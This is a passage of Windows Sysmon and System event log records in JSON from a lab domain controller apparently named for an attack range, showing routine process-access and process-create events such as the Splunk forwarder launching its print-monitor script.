C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.517\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010CB970500}\r\nTargetProcessId: 1212\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.517","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010CB970500}","TargetProcessId":"1212","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.628\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-0010189B0500}\r\nProcessId: 2252\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.628","ProcessGuid":"{41C8662E-1FF7-5F25-0000-0010189B0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\WinPrintMon.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010189B0500}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010189B0500}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76854,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The MapsBroker service entered the stopped state.","param1":"MapsBroker","param2":"stopped","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010189B0500}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010189B0500}","TargetProcessId":"2252","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.627","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3670,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.627\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 